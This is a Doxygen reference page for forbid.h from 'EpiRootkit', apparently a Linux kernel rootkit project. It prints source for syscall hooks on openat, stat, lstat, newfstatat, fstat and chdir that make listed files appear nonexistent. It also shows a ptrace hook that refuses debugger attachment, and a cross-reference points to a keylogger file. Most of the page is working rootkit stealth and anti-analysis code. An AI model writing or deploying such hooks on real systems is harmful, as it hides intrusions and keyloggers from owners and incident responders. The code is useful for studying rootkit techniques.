EpiRootkit
By STDBOOL
Loading...
Searching...
No Matches
Classes | Functions | Variables
forbid.h File Reference
#include <linux/file.h>
#include <linux/fs.h>
#include <linux/kernel.h>
#include <linux/list.h>
#include <linux/namei.h>
#include <linux/ptrace.h>
#include <linux/spinlock.h>
#include <linux/types.h>
#include <linux/uaccess.h>
#include "config.h"
Include dependency graph for forbid.h:
This graph shows which files directly or indirectly include this file:

Go to the source code of this file.

Classes

struct  forbidden_file
 

Functions

int add_forbidden_file (const char *path)
 
int remove_forbidden_file (const char *path)
 
int list_forbidden_files (char *buf, size_t buf_size)
 
bool path_is_forbidden (const char __user *u_path)
 
asmlinkage long notrace openat_hook (const struct pt_regs *regs)
 
asmlinkage long notrace stat_hook (const struct pt_regs *regs)
 
asmlinkage long notrace chdir_hook (const struct pt_regs *regs)
 
asmlinkage void notrace ptrace_hook (struct pt_regs *regs)
 

Variables

struct list_head forbidden_files_list
 
spinlock_t forbidden_files_lock
 
asmlinkage long(* __orig_openat )(const struct pt_regs *)
 
asmlinkage long(* __orig_newfstatat )(const struct pt_regs *)
 
asmlinkage long(* __orig_fstat )(const struct pt_regs *)
 
asmlinkage long(* __orig_lstat )(const struct pt_regs *)
 
asmlinkage long(* __orig_stat )(const struct pt_regs *)
 
asmlinkage long(* __orig_chdir )(const struct pt_regs *regs)
 
asmlinkage long(* __orig_ptrace )(const struct pt_regs *regs)
 

Function Documentation

◆ add_forbidden_file()

int add_forbidden_file ( const char *  path)

◆ chdir_hook()

asmlinkage long notrace chdir_hook ( const struct pt_regs *  regs)

Definition at line 66 of file forbid.c.

66 {
67 const char __user *u_path = (const char __user *)regs->di;
68 if (forbid_contains(u_path))
69 return -ENOENT;
70 return __orig_chdir(regs);
71}
__orig_chdir
asmlinkage long(* __orig_chdir)(const struct pt_regs *regs)
Definition forbid.c:10
forbid_contains
int forbid_contains(const char __user *u_path)
Definition forbid_api.c:81

◆ list_forbidden_files()

int list_forbidden_files ( char *  buf,
size_t  buf_size 
)

◆ openat_hook()

asmlinkage long notrace openat_hook ( const struct pt_regs *  regs)

Definition at line 13 of file forbid.c.

13 {
14 const char __user *u_path = (const char __user *)regs->si;
15 if (forbid_contains(u_path))
16 return -ENOENT;
17 return __orig_openat(regs);
18}
__orig_openat
asmlinkage long(* __orig_openat)(const struct pt_regs *)
Definition forbid.c:5

◆ path_is_forbidden()

bool path_is_forbidden ( const char __user *  u_path)

◆ ptrace_hook()

asmlinkage void notrace ptrace_hook ( struct pt_regs *  regs)

Definition at line 73 of file forbid.c.

73 {
74 long request = regs->di;
75
76 // Check pid for special processes ? Don't know if this function is very
77 // useful... pid_t pid = regs->si;
78
79 if (request == PTRACE_ATTACH || request == PTRACE_TRACEME || request == PTRACE_DETACH) {
80 regs->ax = -EPERM;
81 }
82 else {
83 regs->ax = __orig_ptrace(regs);
84 }
85}
__orig_ptrace
asmlinkage long(* __orig_ptrace)(const struct pt_regs *regs)
Definition forbid.c:11

◆ remove_forbidden_file()

int remove_forbidden_file ( const char *  path)

◆ stat_hook()

asmlinkage long notrace stat_hook ( const struct pt_regs *  regs)

Definition at line 20 of file forbid.c.

20 {
21 const char __user *u_path = NULL;
22
23 switch ((int)regs->orig_ax) {
24 case __NR_stat:
25 case __NR_lstat:
26 u_path = (const char __user *)regs->di;
27 break;
28 case __NR_newfstatat:
29 u_path = (const char __user *)regs->si;
30 break;
31 case __NR_fstat:
32 int fd = (int)regs->di;
33 struct file *filp = fget(fd);
34
35 // Not sure, but seems to work
36 if (filp) {
37 struct path p = filp->f_path;
38 path_get(&p);
39 char buf_path[512];
40 char *full = d_path(&p, buf_path, sizeof(buf_path));
41 path_put(&p);
42 if (full && forbid_contains_str(full)) {
43 fput(filp);
44 return -ENOENT;
45 }
46 }
47 fput(filp);
48 return __orig_fstat(regs);
49 }
50
51 if (forbid_contains(u_path))
52 return -ENOENT;
53
54 switch ((int)regs->orig_ax) {
55 case __NR_stat:
56 return __orig_stat(regs);
57 case __NR_lstat:
58 return __orig_lstat(regs);
59 case __NR_newfstatat:
60 return __orig_newfstatat(regs);
61 default:
62 return -ENOENT;
63 }
64}
file
static struct dentry * file
Definition epikeylog.c:145
__orig_lstat
asmlinkage long(* __orig_lstat)(const struct pt_regs *)
Definition forbid.c:7
__orig_newfstatat
asmlinkage long(* __orig_newfstatat)(const struct pt_regs *)
Definition forbid.c:6
__orig_fstat
asmlinkage long(* __orig_fstat)(const struct pt_regs *)
Definition forbid.c:8
__orig_stat
asmlinkage long(* __orig_stat)(const struct pt_regs *)
Definition forbid.c:9
forbid_contains_str
int forbid_contains_str(const char *k_path)
Definition forbid_api.c:102

Variable Documentation

◆ __orig_chdir

asmlinkage long(* __orig_chdir) (const struct pt_regs *regs) ( const struct pt_regs *  regs)
extern

Definition at line 10 of file forbid.c.

◆ __orig_fstat

asmlinkage long(* __orig_fstat) (const struct pt_regs *) ( const struct pt_regs *  )
extern

Definition at line 8 of file forbid.c.

◆ __orig_lstat

asmlinkage long(* __orig_lstat) (const struct pt_regs *) ( const struct pt_regs *  )
extern

Definition at line 7 of file forbid.c.

◆ __orig_newfstatat

asmlinkage long(* __orig_newfstatat) (const struct pt_regs *) ( const struct pt_regs *  )
extern

Definition at line 6 of file forbid.c.

◆ __orig_openat

asmlinkage long(* __orig_openat) (const struct pt_regs *) ( const struct pt_regs *  )
extern

Definition at line 5 of file forbid.c.

◆ __orig_ptrace

asmlinkage long(* __orig_ptrace) (const struct pt_regs *regs) ( const struct pt_regs *  regs)
extern

Definition at line 11 of file forbid.c.

◆ __orig_stat

asmlinkage long(* __orig_stat) (const struct pt_regs *) ( const struct pt_regs *  )
extern

Definition at line 9 of file forbid.c.

◆ forbidden_files_list

struct list_head forbidden_files_list
extern

◆ forbidden_files_lock

spinlock_t forbidden_files_lock
extern